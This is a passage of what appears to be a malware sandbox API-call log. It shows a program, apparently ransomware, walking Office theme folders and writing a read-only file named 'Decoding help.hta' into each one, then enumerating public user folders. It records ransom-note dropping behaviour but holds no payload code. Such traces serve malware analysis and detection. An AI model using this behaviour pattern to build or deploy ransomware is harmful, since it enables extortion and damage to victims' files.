shared\\themes14\\sky\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.694] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x29f1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x29f1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.695] CloseHandle (hObject=0xe6c) returned 1 [0061.695] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 875 os_tid = 0xb20 [0054.831] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*.*", lpFindFileData=0x2a05fd30 | out: lpFindFileData=0x2a05fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b6e8 [0061.349] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.349] FindNextFileW (in: hFindFile=0x10a4b6e8, lpFindFileData=0x2a05fd30 | out: lpFindFileData=0x2a05fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.349] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.349] FindNextFileW (in: hFindFile=0x10a4b6e8, lpFindFileData=0x2a05fd30 | out: lpFindFileData=0x2a05fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.349] lstrcpyW (in: lpString1=0x2ab01088, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*.*" [0061.349] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*.*") returned 69 [0061.350] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\Decoding help.hta" [0061.350] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\decoding help.hta")) returned 0xffffffff [0061.350] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.696] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2a05fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2a05fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.696] CloseHandle (hObject=0xe6c) returned 1 [0061.696] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 876 os_tid = 0xb30 [0054.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*.*", lpFindFileData=0x2a19fd30 | out: lpFindFileData=0x2a19fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b728 [0061.350] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.350] FindNextFileW (in: hFindFile=0x10a4b728, lpFindFileData=0x2a19fd30 | out: lpFindFileData=0x2a19fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.350] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.350] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.350] FindNextFileW (in: hFindFile=0x10a4b728, lpFindFileData=0x2a19fd30 | out: lpFindFileData=0x2a19fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x8a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.350] lstrcpyW (in: lpString1=0x2aa50e98, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*.*" [0061.350] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*.*") returned 70 [0061.350] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\Decoding help.hta" [0061.350] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\decoding help.hta")) returned 0xffffffff [0061.351] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.697] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2a19fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2a19fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.698] CloseHandle (hObject=0xe6c) returned 1 [0061.698] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 877 os_tid = 0xb00 [0054.836] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*.*", lpFindFileData=0x2a2dfd30 | out: lpFindFileData=0x2a2dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b768 [0061.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.351] FindNextFileW (in: hFindFile=0x10a4b768, lpFindFileData=0x2a2dfd30 | out: lpFindFileData=0x2a2dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.351] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.351] FindNextFileW (in: hFindFile=0x10a4b768, lpFindFileData=0x2a2dfd30 | out: lpFindFileData=0x2a2dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x9df, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.351] lstrcpyW (in: lpString1=0x24fe73c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*.*" [0061.351] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*.*") returned 70 [0061.351] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\Decoding help.hta" [0061.351] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\decoding help.hta")) returned 0xffffffff [0061.351] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.699] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2a2dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2a2dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.699] CloseHandle (hObject=0xe6c) returned 1 [0061.699] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 878 os_tid = 0xb3c [0054.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*.*", lpFindFileData=0x2a41fd30 | out: lpFindFileData=0x2a41fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3f0bd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b7a8 [0061.352] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.352] FindNextFileW (in: hFindFile=0x10a4b7a8, lpFindFileData=0x2a41fd30 | out: lpFindFileData=0x2a41fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3f0bd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.352] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.352] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.352] FindNextFileW (in: hFindFile=0x10a4b7a8, lpFindFileData=0x2a41fd30 | out: lpFindFileData=0x2a41fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.352] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*.*" [0061.352] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*.*") returned 72 [0061.352] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\Decoding help.hta" [0061.352] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\decoding help.hta")) returned 0xffffffff [0061.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.700] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2a41fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2a41fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.701] CloseHandle (hObject=0xe6c) returned 1 [0061.701] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 879 os_tid = 0xb34 [0054.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*.*", lpFindFileData=0x2a55fd30 | out: lpFindFileData=0x2a55fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b7e8 [0061.353] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.353] FindNextFileW (in: hFindFile=0x10a4b7e8, lpFindFileData=0x2a55fd30 | out: lpFindFileData=0x2a55fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.353] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.353] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.353] FindNextFileW (in: hFindFile=0x10a4b7e8, lpFindFileData=0x2a55fd30 | out: lpFindFileData=0x2a55fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x68b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.353] lstrcpyW (in: lpString1=0x244d8180, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*.*" [0061.353] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*.*") returned 70 [0061.353] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\Decoding help.hta" [0061.353] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\decoding help.hta")) returned 0xffffffff [0061.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.702] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2a55fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2a55fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.702] CloseHandle (hObject=0xe6c) returned 1 [0061.703] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 880 os_tid = 0xb40 [0054.842] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*.*", lpFindFileData=0x2a69fd30 | out: lpFindFileData=0x2a69fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d416d30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b828 [0061.354] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.354] FindNextFileW (in: hFindFile=0x10a4b828, lpFindFileData=0x2a69fd30 | out: lpFindFileData=0x2a69fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d416d30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.354] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.354] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.354] FindNextFileW (in: hFindFile=0x10a4b828, lpFindFileData=0x2a69fd30 | out: lpFindFileData=0x2a69fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x137f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.354] lstrcpyW (in: lpString1=0x1101f668, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*.*" [0061.354] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*.*") returned 72 [0061.354] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\Decoding help.hta" [0061.354] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\decoding help.hta")) returned 0xffffffff [0061.354] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xebc [0062.537] WriteFile (in: hFile=0xebc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2a69fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2a69fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0062.538] CloseHandle (hObject=0xebc) returned 1 [0062.538] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 881 os_tid = 0xb48 [0054.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*.*", lpFindFileData=0x2b7afd30 | out: lpFindFileData=0x2b7afd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 882 os_tid = 0xa78 [0054.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*.*", lpFindFileData=0x2b8efd30 | out: lpFindFileData=0x2b8efd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 883 os_tid = 0xb60 [0054.851] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*.*", lpFindFileData=0x2ba2fd30 | out: lpFindFileData=0x2ba2fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 884 os_tid = 0xa7c [0054.854] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*.*", lpFindFileData=0x2bb6fd30 | out: lpFindFileData=0x2bb6fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, 